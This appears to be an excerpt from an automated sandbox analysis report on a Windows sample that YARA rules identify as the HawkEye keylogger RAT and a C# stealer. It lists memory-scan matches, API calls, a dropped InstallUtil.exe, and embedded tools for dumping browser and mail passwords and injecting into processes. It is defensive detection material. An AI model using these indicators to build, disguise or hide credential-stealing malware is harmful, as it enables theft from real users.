                  Source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.FukQGQj7cl.exe.478476a.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 1.2.FukQGQj7cl.exe.478476a.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 16.2.InstallUtil.exe.30ab2a0.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  .NET source code contains very large array initializationsShow sources
                  Source: 1.2.FukQGQj7cl.exe.a70000.0.unpack, As4x/Af5k.csLarge array initialization: .cctor: array initializer size 2392
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeCode function: 1_2_00A76BED
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeCode function: 1_2_012EC8F8
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeCode function: 1_2_012E7428
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeCode function: 1_2_012EF7C0
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeCode function: 1_2_012EBC10
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeCode function: 1_2_012EDFD8
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 16_2_00D620B0
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 16_2_02E4B29C
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 16_2_02E4C310
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 16_2_02E499D0
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 16_2_02E4DFD0
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_00404DDB
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_0040BD8A
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_00404E4C
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_00404EBD
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_00404F4E
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00404419
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00404516
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00413538
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_004145A1
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_0040E639
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_004337AF
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_004399B1
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_0043DAE7
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00405CF6
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00403F85
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00411F99
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413F8E appears 66 times
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413E2D appears 34 times
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00442A90 appears 36 times
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004141D6 appears 88 times
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00411538 appears 35 times
                  Source: FukQGQj7cl.exeBinary or memory string: OriginalFilename vs FukQGQj7cl.exe
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs FukQGQj7cl.exe
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs FukQGQj7cl.exe
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs FukQGQj7cl.exe
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs FukQGQj7cl.exe
                  Source: FukQGQj7cl.exe, 00000001.00000002.331167441.0000000006D20000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHCore1.dll0 vs FukQGQj7cl.exe
                  Source: FukQGQj7cl.exe, 00000001.00000002.307395644.0000000000B8D000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTRCoManagementSystem.exeD vs FukQGQj7cl.exe
                  Source: FukQGQj7cl.exe, 00000001.00000002.330769051.0000000006BE0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPe6.dll" vs FukQGQj7cl.exe
                  Source: FukQGQj7cl.exe, 00000001.00000002.330413840.0000000006910000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs FukQGQj7cl.exe
                  Source: FukQGQj7cl.exe, 00000001.00000003.299838271.0000000006CE4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInstallUtil.exeT vs FukQGQj7cl.exe
                  Source: FukQGQj7cl.exe, 00000001.00000002.309200167.000000000130A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs FukQGQj7cl.exe
                  Source: FukQGQj7cl.exeBinary or memory string: OriginalFilenameTRCoManagementSystem.exeD vs FukQGQj7cl.exe
                  Source: FukQGQj7cl.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: 16.2.InstallUtil.exe.8460000.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.2.InstallUtil.exe.84c0000.12.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 16.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.FukQGQj7cl.exe.478476a.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 1.2.FukQGQj7cl.exe.478476a.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 16.2.InstallUtil.exe.30ab2a0.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.2.InstallUtil.exe.30ab2a0.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 16.2.InstallUtil.exe.30bea60.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000010.00000002.501178621.00000000084C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000010.00000002.501112721.0000000008460000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@7/5@3/3
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_0040ED0B FindResourceA,SizeofResource,LoadResource,LockResource,
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FukQGQj7cl.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeFile created: C:\Users\user\AppData\Local\Temp\InstallUtil.exeJump to behavior
                  Source: FukQGQj7cl.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
